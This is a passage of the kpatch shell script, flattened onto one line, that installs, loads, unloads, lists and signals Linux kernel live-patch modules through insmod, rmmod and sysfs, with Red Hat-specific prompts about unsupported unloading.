"Valid commands:" >&2 usage_cmd "install [-k|--kernel-version=<kernel version>] <module>" "install patch module to be loaded at boot" usage_cmd "uninstall [-k|--kernel-version=<kernel version>] <module>" "uninstall patch module" echo >&2 usage_cmd "load --all" "load all installed patch modules into the running kernel" usage_cmd "load <module>" "load patch module into the running kernel" usage_cmd "unload --all (UNSUPPORTED)" "unload all patch modules from the running kernel" usage_cmd "unload <module> (UNSUPPORTED)" "unload patch module from the running kernel" echo >&2 usage_cmd "info <module>" "show information about a patch module" echo >&2 usage_cmd "list" "list installed patch modules" echo >&2 usage_cmd "signal" "signal/poke any process stalling the current patch transition. This is only useful on systems that have the sysfs livepatch signal interface. On other systems, the signaling should be done automatically by the OS and this subcommand is a no-op." echo >&2 usage_cmd "version" "display the kpatch version" exit 1 } warn() { echo "kpatch: $*" >&2 } die() { warn "$@" exit 1 } confirm_prompt() { local prompt="$1" local answer while true; do read -rp "$prompt [Y/N] " answer [[ $answer == 'Y' || $answer == 'y' ]] && return 0 [[ $answer == 'N' || $answer == 'n' ]] && return 1 done } __find_module () { MODULE="$1" [[ -f "$MODULE" ]] && return MODULE="$INSTALLDIR/$(uname -r)/$1" [[ -f "$MODULE" ]] && return return 1 } mod_name () { MODNAME="$(basename "$1")" MODNAME="${MODNAME%.ko}" MODNAME="${MODNAME//-/_}" } find_module () { arg="$1" if [[ "$arg" =~ \.ko ]]; then __find_module "$arg" || return 1 mod_name "$MODULE" return else for i in "$INSTALLDIR/$(uname -r)"/*; do mod_name "$i" if [[ "$MODNAME" == "$arg" ]]; then MODULE="$i" return fi done fi return 1 } find_core_module() { COREMOD="$SCRIPTDIR"/../kmod/core/kpatch.ko [[ -f "$COREMOD" ]] && return COREMOD="/usr/local/lib/kpatch/$(uname -r)/kpatch.ko" [[ -f "$COREMOD" ]] && return COREMOD="/usr/lib/kpatch/$(uname -r)/kpatch.ko" [[ -f "$COREMOD" ]] && return COREMOD="/usr/local/lib/modules/$(uname -r)/extra/kpatch/kpatch.ko" [[ -f "$COREMOD" ]] && return COREMOD="/usr/lib/modules/$(uname -r)/extra/kpatch/kpatch.ko" [[ -f "$COREMOD" ]] && return return 1 } kpatch_core_loaded() { [[ -d "/sys/kernel/kpatch" ]] } core_loaded () { [[ -d "/sys/kernel/kpatch" ]] || [[ -d "/sys/kernel/livepatch" ]] } get_module_name () { readelf -p .gnu.linkonce.this_module "$1" | grep '\[.*\]' | awk '{print $3}' } init_sysfs_var() { # If the kernel is configured with CONFIG_LIVEPATCH, use that. # Otherwise, use the kpatch core module (kpatch.ko). if [[ -e /sys/kernel/livepatch ]] ; then # livepatch ABI SYSFS="/sys/kernel/livepatch" elif [[ -e /sys/kernel/kpatch/patches ]] ; then # kpatch pre-0.4 ABI SYSFS="/sys/kernel/kpatch/patches" else # kpatch 0.4 ABI SYSFS="/sys/kernel/kpatch" fi } verify_module_checksum () { modname="$(get_module_name "$1")" [[ -z "$modname" ]] && return 1 checksum="$(readelf -p .kpatch.checksum "$1" 2>&1 | grep '\[.*\]' | awk '{print $3}')" # Fail checksum match only if both exist and diverge if [[ -n "$checksum" ]] && [[ -e "$SYSFS/${modname}/checksum" ]] ; then sysfs_checksum="$(cat "$SYSFS/${modname}/checksum")" [[ "$checksum" == "$sysfs_checksum" ]] || return 1 fi return 0 } in_transition() { local moddir="$SYSFS/$1" [[ $(cat "$moddir/transition" 2>/dev/null) == "1" ]] && return 0 return 1 } is_stalled() { local module="$1" local pid="$2" local patch_enabled local patch_state patch_enabled="$(cat "$SYSFS/$module/enabled" 2>/dev/null)" patch_state="$(cat "/proc/$pid/patch_state" 2>/dev/null)" # No patch transition in progress [[ "$patch_state" == "-1" ]] && return 1 [[ -z "$patch_enabled" ]] || [[ -z "$patch_state" ]] && return 1 # Stalls can be determined if the process state does not match # the transition target (ie, "enabled" and "patched", "disabled" # and "unpatched"). The state value enumerations match, so we # can just compare them directly: [[ "$patch_enabled" != "$patch_state" ]] && return 0 return 1 } get_transition_patch() { local module local modname for module in "$SYSFS"/*; do modname=$(basename "$module") if in_transition "$modname" ; then echo "$modname" return fi done } show_stalled_processes() { local module local proc_task local tid module=$(get_transition_patch) [[ -z "$module" ]] && return echo "" echo "Stalled processes:" for proc_task in /proc/[0-9]*/task/[0-9]*; do tid=${proc_task#*/task/} is_stalled "$module" "$tid" && echo -e "$tid $(cat "$proc_task"/comm 2>/dev/null)\nstack:\n$(cat "$proc_task"/stack 2>/dev/null)" done } signal_stalled_processes() { local module local proc_task local tid module=$(get_transition_patch) [[ -z "$module" ]] && return if [[ -e "/sys/kernel/livepatch/$module/signal" ]] ; then echo "signaling stalled process(es):" echo 1 > "/sys/kernel/livepatch/$module/signal" else warn "Livepatch process signaling is performed automatically on your system." warn "Skipping manual process signaling." fi } wait_for_patch_transition() { local module="$1" local i in_transition "$module" || return 0 echo "waiting (up to $POST_ENABLE_WAIT seconds) for patch transition to complete..." for (( i=0; i<POST_ENABLE_WAIT; i++ )); do if ! in_transition "$module" ; then echo "transition complete ($i seconds)" return 0 fi sleep 1s done echo "patch transition has stalled!" signal_stalled_processes echo "waiting (up to $POST_SIGNAL_WAIT seconds) for patch transition to complete..." for (( i=0; i<POST_SIGNAL_WAIT; i++ )); do if ! in_transition "$module" ; then echo "transition complete ($i seconds)" return 0 fi sleep 1s done return 1 } module_ref_count() { local modname="$1" [[ $(cat "/sys/module/$modname/refcnt" 2>/dev/null) -gt "0" ]] } wait_for_zero_module_ref_count() { local modname="$1" local i=0 # We can't rely on a zero refcount with kpatch.ko as it # implements KPATCH_FORCE_UNSAFE with an additional reference on # kpatch-patch modules to avoid potential crashes. kpatch_core_loaded && return 0 module_ref_count "$modname" || return 0 echo "waiting (up to $MODULE_REF_WAIT seconds) for module refcount..." for (( i=0; i<MODULE_REF_WAIT; i++ )); do module_ref_count "$modname" || return 0 sleep 1s done return 1 } load_module () { local module="$1" if ! core_loaded; then if modprobe -q kpatch; then echo "loaded core module" else find_core_module || die "can't find core module" echo "loading core module: $COREMOD" insmod "$COREMOD" || die "failed to load core module" fi # Now that the core module has been loaded, set $SYSFS to the # correct value based on the loaded core module's ABI. init_sysfs_var fi local modname modname="$(get_module_name "$module")" local moddir="$SYSFS/$modname" if [[ -d "$moddir" ]] ; then if [[ "$(cat "${moddir}/enabled")" -eq 0 ]]; then if verify_module_checksum "$module"; then # same checksum echo "module already loaded, re-enabling" echo 1 > "${moddir}/enabled" || die "failed to re-enable module $modname" if ! wait_for_patch_transition "$modname" ; then show_stalled_processes echo "module $modname did not complete its transition, disabling..." echo 0 > "${moddir}/enabled" || die "failed to disable module $modname" wait_for_patch_transition "$modname" die "error: failed to re-enable module $modname (transition stalled), patch disabled" fi return else die "error: cannot re-enable patch module $modname, cannot verify checksum match" fi else echo "module named $modname already loaded and enabled" fi else # Cleanup possibly loaded, but disabled patch. remove_module "$modname" "quiet" echo "loading patch module: $module" local i=0 while true; do out="$(LC_ALL=C insmod "$module" 2>&1)" [[ -z "$out" ]] && break echo "$out" 1>&2 [[ ! "$out" =~ "Device or resource busy" ]] && die "failed to load module $module" # "Device or resource busy" means the activeness safety check # failed. Retry in a few seconds. i=$((i+1)) if [[ $i -eq $MAX_LOAD_ATTEMPTS ]]; then die "failed to load module $module" break else warn "retrying..." sleep $RETRY_INTERVAL fi done fi if ! wait_for_patch_transition "$modname" ; then show_stalled_processes echo "module $modname did not complete its transition, unloading..." unload_module "$modname" die "error: failed to load module $modname (transition stalled)" fi return 0 } disable_patch () { local modname="$1" local enabled="$SYSFS/$modname/enabled" if ! [[ -e "$enabled" ]]; then if [[ -d "/sys/module/$modname" ]] ; then # Module is loaded, but already disabled return 0 fi warn "patch module $modname is not loaded" return 1 fi if [[ "$(cat "$enabled")" -eq 1 ]]; then echo "disabling patch module: $modname" local i=0 while true; do out="$(export LC_ALL=C; sh -c "echo 0 > $enabled" 2>&1)" [[ -z "$out" ]] && break echo "$out" 1>&2 if [[ ! "$out" =~ "Device or resource busy" ]]; then return 1 fi # "Device or resource busy" means the activeness safety check # failed. Retry in a few seconds. i=$((i+1)) if [[ $i -eq $MAX_LOAD_ATTEMPTS ]]; then return 1 else warn "retrying..." sleep $RETRY_INTERVAL fi done fi } disable_patch_strict () { local modname="$1" disable_patch "$modname" || die "failed to disable module $modname" if ! wait_for_patch_transition "$modname" ; then die "transition stalled for $modname" fi } remove_module () { local modname="$1" if ! wait_for_zero_module_ref_count "$modname"; then die "failed to unload module $modname (refcnt)" fi if [[ "$#" -lt 2 || "$2" != "quiet" ]] ; then echo "unloading patch module: $modname" fi # ignore any error here because rmmod can fail if the module used # KPATCH_FORCE_UNSAFE. rmmod "$modname" 2> /dev/null || return 0 } unload_module () { PATCH="${1//-/_}" PATCH="${PATCH%.ko}" disable_patch_strict "$PATCH" remove_module "$PATCH" } get_module_version() { MODVER="$(modinfo -F vermagic "$1")" || return 1 MODVER="${MODVER/ */}" } unset MODULE # Initialize the $SYSFS var. This only works if the core module has been # loaded. Otherwise, the value of $SYSFS doesn't matter at this point anyway, # and we'll have to call this function again after loading it. init_sysfs_var [[ "$#" -lt 1 ]] && usage # RHEL-specific support options case "$1" in "force") # For scripting purposes, support "kpatch force unload". # Shift out the "force" to avoid the user-prompt check below. shift ;; "unload") confirm_prompt "WARNING: Red Hat doesn't support unloading of kpatches, continue anyway?" || exit 1 ;; esac case "$1" in "load") [[ "$#" -ne 2 ]] && usage case "$2" in "--all") for i in "$INSTALLDIR/$(uname -r)"/*.ko; do [[ -e "$i" ]] || continue load_module "$i" || die "failed to load module $i" done ;; *) PATCH="$2" find_module "$PATCH" || die "can't find $PATCH" load_module "$MODULE" || die "failed to load module $PATCH" ;; esac ;; "unload") [[ "$#" -ne 2 ]] && usage case "$2" in "--all") # Versions of linux < 5.1 livepatching require patches to be # disabled in the inverse order in which they were enabled. while true; do nr_disabled=0 for module in "$SYSFS"/*; do modname="$(basename "$module")" [[ -e "$module" ]] || continue disable_patch "$modname" || continue if ! wait_for_patch_transition "$modname" ; then warn "transition stalled for $modname" continue fi remove_module "$modname" nr_disabled=$((nr_disabled + 1)) done if [ $nr_disabled -eq 0 ]; then break fi done nr_remaining=0 for module in "$SYSFS"/*; do modname="$(basename "$module")" [[ -e "$module" ]] || continue nr_remaining=$((nr_remaining + 1)) warn "failed to unload module $modname" done if [ $nr_remaining -gt 0 ]; then exit 1 fi ;; *) unload_module "$(basename "$2")" || die "failed to unload module $2" ;; esac ;; "install") KVER="$(uname -r)" shift options="$(getopt -o k: -l "kernel-version:" -- "$@")" || die "getopt failed" eval set -- "$options" while [[ $# -gt 0 ]]; do case "$1" in -k|--kernel-version) KVER="$2" shift ;; --) [[ -z "$2" ]] && die "no module file specified" PATCH="$2" ;; esac shift done [[ ! -e "$PATCH" ]] && die "$PATCH doesn't exist" [[ "${PATCH: -3}" == ".ko" ]] || die "$PATCH isn't a .ko file" get_module_version "$PATCH" || die "modinfo failed" [[ "$KVER" != "$MODVER" ]] && die "invalid module version $MODVER for kernel $KVER" [[ -e "$INSTALLDIR/$KVER/$(basename "$PATCH")" ]] && die "$PATCH is already installed" echo "installing $PATCH ($KVER)" mkdir -p "$INSTALLDIR/$KVER" || die "failed to create install directory" cp -f "$PATCH" "$INSTALLDIR/$KVER" || die "failed to install module $PATCH" command -v systemctl > /dev/null 2>&1 && systemctl enable kpatch.service ;; "uninstall") KVER="$(uname -r)" shift options="$(getopt -o k: -l "kernel-version:" -- "$@")" || die "getopt failed" eval set -- "$options" while [[ $# -gt 0 ]]; do case "$1" in -k|--kernel-version) KVER="$2" shift ;; --) [[ -z "$2" ]] && die "no module file specified" PATCH="$2" [[ "$PATCH" != "$(basename "$PATCH")" ]] && die "please supply patch module name without path" ;; esac shift done MODULE="$INSTALLDIR/$KVER/$PATCH" if [[ ! -f "$MODULE" ]]; then mod_name "$PATCH" PATCHNAME="$MODNAME" for i in "$INSTALLDIR/$KVER"/*; do mod_name "$i" if [[ "$MODNAME" == "$PATCHNAME" ]]; then MODULE="$i" break fi done fi [[ ! -e "$MODULE" ]] && die "$PATCH is not installed for kernel $KVER" echo "uninstalling $PATCH ($KVER)" rm -f "$MODULE" || die "failed to uninstall module $PATCH" rmdir --ignore-fail-on-non-empty "$INSTALLDIR/$KVER" || die "failed to remove directory $INSTALLDIR/$KVER" ;; "list") [[ "$#" -ne 1 ]] && usage echo "Loaded patch modules:" for module in "$SYSFS"/*; do if [[ -e "$module" ]]; then modname=$(basename "$module") if [[ "$(cat "$module/enabled" 2>/dev/null)" -eq 1 ]]; then in_transition "$modname" && state="enabling..." \ || state="enabled" else in_transition "$modname" && state="disabling..." \ || state="disabled" fi echo "$modname [$state]" fi done show_stalled_processes echo "" echo "Installed patch modules:" for kdir in "$INSTALLDIR"/*; do [[ -e "$kdir" ]] || continue for module in "$kdir"/*.ko; do [[ -e "$module" ]] || continue mod_name "$module" echo "$MODNAME ($(basename "$kdir"))" done done ;; "info") [[ "$#" -ne 2 ]] && usage PATCH="$2" find_module "$PATCH" || die "can't find $PATCH" echo "Patch information for $PATCH:" modinfo "$MODULE" || die "failed to get info for module $PATCH" ;; "signal") [[ "$#" -ne 1 ]] && usage signal_stalled_processes ;; "help"|"-h"|"--help") usage ;; "version"|"-v"|"--version") echo "$VERSION" ;; *) echo "subcommand $1 not recognized" usage ;; esac
Close